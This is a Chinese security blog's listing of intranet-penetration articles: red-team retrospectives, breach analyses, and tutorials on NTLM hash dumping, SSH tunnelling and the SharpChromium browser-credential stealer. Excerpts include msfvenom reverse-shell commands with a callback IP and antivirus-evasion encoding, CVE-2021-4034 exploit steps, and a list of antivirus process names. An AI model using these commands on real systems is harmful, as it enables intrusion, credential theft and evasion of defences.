
内网渗透
文章平均质量分 62
安全大哥
接渗透测试,护网,安全咨询,安全培训,安全溯源,应急响应等业务,需要私信我
展开
-
重磅消息!Bybit交易所被盗事件已被正式确认为加密货币史上最大规模的盗窃案。
无论你的智能合约设计得多么坚不可摧,无论你设置了多少道签名验证,一旦攻击者能够操控人类在签名时所看到的内容,整个安全体系都将土崩瓦解。随后,攻击者的手法变得更加高明——他们先是将1万枚ETH分散到39个不同的地址,紧接着又将另外1万枚ETH分散到另外9个地址。每个多签钱包的签署人都看到来自 @safe的貌似完全合法 的用户界面 (UI),上面显示着 “一切正常” 的交易信息。14、我们将密切关注事态发展。但实际上,他们签署的却是暗藏玄机的指令,旨在篡改他们ETH冷钱包的智能合约逻辑!原创 2025-02-22 18:37:24 · 348 阅读 · 0 评论 -
【渗透系列】某运营商外网打点到内网横向渗透的全过程
接下来通过拿到的权限,收集本地shadow文件、linux环境变量、linux的history文件、浏览器记录、服务器上的数据库配置文件等,继续做成密码字典,重新进行内网各种口令爆破,继续拿权限,这样周而复始做过几轮之后,拿了很多权限,有windows主机,也有Linux主机。拿了域控自然是很高兴,但是别高兴得太早,这个域控能控制大约800多台主机,我记得当时域内有很多英文的操作系统,还有一些有关HP的服务器,我在里面转了一晚上,没找到有价值的业务系统,最后我也没搞明白这么多机器是用来做什么的。转载 2025-01-11 21:29:04 · 100 阅读 · 0 评论 -
【渗透系列】美国安全局NSA入侵西北工业大学流程图梳理和分析
的方式,向西北工业大学内部网络深度渗透,先后控制运维网、办公网的核心网络设备、服务器及终端,并获取了部分西北工业大学内部路由器、交换机等重要网络节点设备的控制权,窃取身份验证数据,并进一步实施渗透拓展,最终达成了对西北工业大学内部网络的隐蔽控制。,对telnet运维管理等服务器的ssh、telnet、rlogin等账号密码进行嗅探,同时收集服务器日志,命令操作记录,服务器配置文件等,同时获取了大量边界服务器账号密码,运维人员账号密码,FTP服务器的资料等等。同时,部分教职工电脑也存在遭受网络攻击的痕迹。转载 2025-01-11 21:18:04 · 196 阅读 · 0 评论 -
【渗透系列】某银行外网打点到内网核心区红队评估复盘
走投无路的时候,翻了翻源码中的初始化sql文件,发现系统在启动过程中,会执行这些sql文件,从而默认会添加一个测试账号,于是使用此测试账号,登录后台获取webshell,后续主要的内网横向是通过这个入口开展的。通过前期信息收集,再结合外网web应用系统找到的sql注入漏洞、云上数据库权限等,得到了一个手机号列表,通过这些手机号挨个加微*信聊天,发送带有压缩包的后门,但是能上线的都是个人笔记本电脑,办公网电脑是绝对不允许通外网的,登录不了微信,所以微*信社工这一思路很快被停止。转载 2025-01-11 20:58:27 · 628 阅读 · 0 评论 -
渗透技巧之ClickHouse数据库安全问题
关于ClickHouse数据库的注入,还是非常有意思的,它有点像我们的老朋友mysql,但又不完全一样,有很多自己独特的打法。随着大数据应用越来越广泛,在实战中遇见这款数据库的可能性也会越来越大,值得一学。转载 2024-10-12 14:20:34 · 1325 阅读 · 0 评论 -
关于钓鱼攻击和防范这些事
本文将从攻击、检测处置和防范三个维度,分别介绍钓鱼攻击方式、钓鱼邮件安全事件运营及防范措施。原创 2023-03-08 14:40:06 · 2083 阅读 · 0 评论 -
域内ntlmhash导出与破解
1、如何使用powershell导出域内所有用户的ntlmhash。2、如何使用hashcat将其ntlmhash进行爆破。原创 2023-02-01 15:09:11 · 551 阅读 · 0 评论 -
Uber攻击流程
1、月初Uber被入侵,下面是整个大概的攻击流程图。原创 2022-09-20 15:29:50 · 252 阅读 · 0 评论 -
关于Navicat的一些使用场景
比如你现在拿到一个目标机器的webshell,然后拿到了这个机器的mysql数据库的口令,但是目标机器mysql默认只能使用127.0.0.1连接,不允许外部ip连接,而且我们拿到的webshell不方便去操作数据库,这个时候可以使用我们的navicat的httop隧道功能进行操作。比如你已经拿到一台跳板机A的权限,然后上传fscan到跳板机器扫描到内网B段很多数据库的弱口令,这个时候你想使用本地的navicat去连接数据库,这个场景的话可以使用navicat的ssh隧道去链接。...原创 2022-08-26 11:56:04 · 691 阅读 · 2 评论 -
一条通往服务器所有端口的隧道
通常为了安全,服务器需要通过跳板机访问,服务器对外网暴露的端口也严格限制。这种情况下若要在本地访问服务器上的服务或系统就会比较蛋疼。有一个简单的解决方案,就是在本地和跳板机之间建立SSH隧道。SSH隧道提供了一个网络代理服务,通过该代理服务可以直接访问跳板机所在的局域网,即服务器上的任意端口,服务都可以直接访问。本文介绍的方法比一般的端口映射更方便,不需要为每个端口配置一条SSH隧道,包括Windows、Mac、Linux上的操作方法。非常简单,只需一条命令即可建立SSH隧道。ssh user@h原创 2022-06-29 11:43:56 · 1179 阅读 · 0 评论 -
CVE-2021-4034漏洞复现
1、漏洞POChttps://github.com/berdav/CVE-2021-40342、漏洞复现下载poc-编译代码-执行exp即可。git clone GitHub - berdav/CVE-2021-4034: CVE-2021-4034 1daymake./cve-2021-4034原创 2022-02-19 09:17:40 · 3927 阅读 · 0 评论 -
收集邮箱地址的在线网站
网址如下:https://app.snov.io/domain-search?name=za.group&tab=emails比如我搜索一下"360-agence.com"这个域。搜索结果如下:原创 2021-07-13 16:35:04 · 2006 阅读 · 0 评论 -
【浏览器密码窃取工具】SharpChromium
github项目地址:https://github.com/djhohnstein/SharpChromium1、SharpChromiumSharpChromium是一个.NET 4.0+ CLR项目,可从Google Chrome,Microsoft Edge和Microsoft Edge Beta检索数据。目前,它可以提取:Cookies(JSON格式) 历史记录(每个历史记录项目都有关联的Cookie) 保存的登录名注意:所有返回的Cookie均为JSON格式。如果您安装了扩展程.原创 2021-03-16 16:00:21 · 1171 阅读 · 0 评论 -
渗透系列之内网渗透密码收集思维导图
渗透系列之内网渗透密码收集思维导图:网盘下载地址:原创 2020-09-19 14:42:48 · 1431 阅读 · 0 评论 -
Windows NetLogon权限提升漏洞(CVE-2020-1472)
漏洞描述微软官方于8月12日发布安全更新,其中修复了一个修复了NetLogon权限提升漏洞(CVE-2020-1472),攻击者通过NetLogon(MS-NRPC),建立与域控间易受攻击的安全通道时,可利用此漏洞获取域管访问权限。成功利用此漏洞的攻击者可以在该网络中的设备上运行相应代码或者程序。同时,微软8月补丁中还涉及其他多个高危漏洞,Windows 用户尽快安装补丁阻止漏洞攻击。漏洞评级CVE-2020-1472 严重影响版本Windows Server 2008 R2..原创 2020-09-15 10:55:31 · 1630 阅读 · 0 评论 -
木马的伪装与免杀
0x01:我们依靠msf生成简单的shellcode免杀msfvenom -p windows/meterpreter/reverse_tcp -a x86 --platform LHOST=XXX LPORT=XXX -e x86/shikata_ga_nai -i 12 -b '\x00\' PrependMigrate=true PrependMIgrateProx=svchost.exe ...转载 2018-04-19 11:19:14 · 9932 阅读 · 11 评论 -
Metasploit框架的学习一之目录结构
首先是介绍整个框架的结构:0x01:最重要的目录是data,modules,scripts,tools,plugins1:我们先进去data目录,该目录包含大量有用的模块,如meterpreter,exploits,wordlists,templates等等我们重点注意meterpreter这个模块,这个通常用于后漏洞利用的功能当中。2:然后我们进wordlists目录,这里面包含了大量的字典3:...原创 2018-06-08 15:37:04 · 2344 阅读 · 0 评论 -
Metasploit常用操作
payload的几个常用生成 1、生成windows下的反弹木马msfvenom -p windows/meterpreter/reverse_tcp LHOST=60.205.212.140 LPORT=8888 -f exe > 8888.exe-p=payload -f format -o path 2、监听use exploit/multi/handler...原创 2018-11-02 15:05:25 · 620 阅读 · 1 评论 -
msf拿到windows的shell显示乱码解决方法
0x01:渗透的时候拿到一台windows7的权限,但使用msf显示乱码,很不舒服 0x02:使用 chcp 65001 这条语句即可解决原创 2018-11-02 15:28:52 · 14390 阅读 · 7 评论 -
windows使用命令执行exe文件
很多时候我们需要在目标windows的机器上执行exe文件获取meterpreter,这个时候只需要执行一条简单的命令进入木马的文件夹,执行 start+空格+xxx.exe原创 2018-11-12 11:26:06 · 23276 阅读 · 0 评论 -
各类杀软对应的进程名
原文链接:https://www.cnblogs.com/hookjoy/p/10899119.html {"360tray.exe", "360安全卫士"}, {"360sd.exe", "360杀毒"}, ...转载 2019-06-17 18:04:39 · 5396 阅读 · 0 评论 -
初识内网渗透
参考文章:https://www.anquanke.com/post/id/86505http://www.freebuf.com/sectool/56432.htmlhttp://www.freebuf.com/articles/network/125278.html原创 2018-04-16 11:35:54 · 516 阅读 · 0 评论